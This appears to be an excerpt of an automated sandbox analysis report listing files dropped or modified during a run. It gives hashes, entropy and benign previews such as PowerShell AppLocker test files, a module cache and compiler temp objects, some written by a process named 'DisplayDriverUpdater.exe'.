MD5:	939A9FBD880F8B22D4CDD65B7324C6DB
SHA1:	62167D495B0993DD0396056B814ABAE415A996EE
SHA-256:	156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
SHA-512:	91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
Malicious:	false
Preview:	...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	48000
Entropy (8bit):	5.076558460676429
Encrypted:	false
SSDEEP:	768:zOfUpBa5THWrxyfrRJPFjhDEN+v+H3nWgMuOxvDwKYYfCwwopbjoRjdvR2retYd2:zOfUpBa5jWrxyflJdjhDEN+vq1MuOdUv
MD5:	E01E44020837350C44EA16070B2E96E5
SHA1:	ECE5810BF16A48B1F9A6C541EAD38B6817E68A7B
SHA-256:	9561022918A71B206FD81DFD64221E8CFA9862E38783DE30AFDD23CABEFD7AC4
SHA-512:	650A70629CABFD17AFE3FA512AB1FA0CC666C6D06461652CF8696DB0CEBFFC42C17AFC75697D2313807BB3B4C0AA9069E5E91D279796D09ADF8B4AEA28430E04
Malicious:	false
Preview:	PSMODULECACHE.J...p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.............z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1........Enable-PnpDevice........Disable-PnpDevice........Get-PnpDevice........Get-PnpDeviceProperty........u.vC.z..a...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1........Set-NetworkSwitchPortMode........Set-NetworkSwitchPortProperty........Set-NetworkSwitchVlanProperty........Disable-NetworkSwitchFeature....)...Remove-NetworkSwitchEthernetPortIPAddress........Get-NetworkSwitchFeature...."...R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	1840
Entropy (8bit):	5.343138903290558
Encrypted:	false
SSDEEP:	48:GSU4y4RdymFoUeCa+g9qr9tK8NT8Rrhjk9ANTiZv:7HyIdvKLp9qr2KT8RRuBv
MD5:	64FAF79DE93B9740957E535C3038902C
SHA1:	33B489FA1E9D8ADCC88D4E9A349EA65B9BCE4D0C
SHA-256:	A0FB64C498F0803053974CB1FF4573D00AEBF288D6693C78A078D56409B8B970
SHA-512:	5C6D21F28936C59A7148588B135D9E6446ADA53AFCA8B130B369B2C50DA8C52558A6AD5E5D010550E4EDC395FA799F30A9798F80B01F4DBBBD8AB578281B6CB7
Malicious:	false
Preview:	@...e...........4...............................................@...............\|.jdY\.H.s9.!..\|4.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...<...............i..VdqF...\|...........System.Configuration@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\RES8ECC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Jan 8 12:28:16 2025, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1340
Entropy (8bit):	4.039921438414605
Encrypted:	false
SSDEEP:	24:HKK9ollE3ScpZHdxQwKOZmNeI+ycuZhNIRakSTWPNnqSed:ole3S4Z9x/KOZmw1ulya3GqS+
MD5:	EA9D93B2129B7C558F2F1355830C7140
SHA1:	0CB60643FDDE7FE420660CD196ACB5A5D8E1367A
SHA-256:	27E8EC113C9EFABB5F8E3DEB28DE2616427B1733DB621D4D0522FD2F1684044E
SHA-512:	11A659032ADBA408BB6F700BA25DCB6276E320015321D342C173DB68F19E24429C2CA9FF445D3DFCE8233992C4A56A318014993714E523D931A7BE400A3E792B
Malicious:	false
Preview:	L...`o~g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP................6.......u................7.......C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.1.d.l.y.2.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\RESB485.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Jan 8 12:28:26 2025, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1336
Entropy (8bit):	4.014821409334575
Encrypted:	false
SSDEEP:	24:HUm9ZcdWLIZHMwKdNwI+ycuZhNwakSsPNnqSSd:ncdUIZzKdm1ulwa38qSC
MD5:	2910F7E91FB279FBC88392BFC532269D
SHA1:	311764857F30C8C41DF3A67E92F95EB67306D577
SHA-256:	6277E026BF3D52ABC75995379F78772BC1E6EDDCAC388B27ED2497D55682F2C1
SHA-512:	E74B7E27372CAA9BD5CEBF41574F1402E092B68B75C89107ABDF87B9608A0F150C572978BA622057BB3F8136DEA3431F389841A0FC96DCD037ADEAB7B3C97100
Malicious:	false
Preview:	L...jo~g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........X....c:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP.....................L\|..B..u............7.......C:\Users\user~1\AppData\Local\Temp\RESB485.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.2.e.j.d.4.w.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0iqy2l4o.vau.psm1

Download File

Process:	C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tj51fnt.man.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ukvz41k.wue.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uaxqswo.o3y.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x4krpdd.4yt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ujahv5c.e0y.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ca1qmj1y.reg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efpnassp.sso.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2bbsgdm.m20.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f43kbbsl.5j5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frw1luo0.q4c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsb0q24h.lsr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnvdcbgj.hd1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwnyfv0b.uq0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibycvlmk.ekw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iclq5j12.s0n.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnr2fxuc.n3g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khjds1y1.vjy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvhey4dk.sma.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcfayhcc.cri.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw4y1zdz.p3f.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhrgno24.cdp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyzilj4l.f2w.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5dbyogd.zgv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

